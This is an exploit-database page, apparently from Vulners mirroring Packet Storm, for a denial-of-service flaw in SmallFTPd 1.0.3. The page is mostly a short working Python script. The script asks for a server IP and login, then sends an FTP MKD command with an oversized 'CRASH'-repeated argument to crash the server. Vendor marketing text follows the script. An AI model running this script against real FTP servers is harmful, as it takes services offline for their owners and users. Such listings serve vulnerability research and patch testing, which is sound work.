Lucene search
K

SmallFTPd 1.0.3 mkd Denial Of Service

🗓️ 26 Oct 2016 00:00:00Reported by Greg PriestType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

SmallFTPd 1.0.3 mkd Denial Of Service exploit

Code
`from ftplib import FTP  
  
print '''  
##############################################  
# Created: ScrR1pTK1dd13 #  
# Name: Greg Priest #  
# Mail: [email protected] #   
##############################################  
  
  
# Exploit Title: smallftp_mkd_command_DoS_Exploit  
# Date: 2016.10.26  
# Exploit Author: Greg Priest  
# Version: smallftpd 1.0.3  
# Tested on: Windows XP, Windows 7 x64  
  
'''  
  
ftp_ip = raw_input("FTP server IP:")  
user = raw_input("username:")  
password = raw_input("password:")  
killercode = 'CRASH' * 100  
ftp = FTP(ftp_ip)  
ftp.login(user, password)  
print ftp.login  
print "CRSAH CODE SENT!"  
FTP.mkd(ftp, killercode)  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Oct 2016 00:00Current
0.2Low risk
Vulners AI Score0.2
21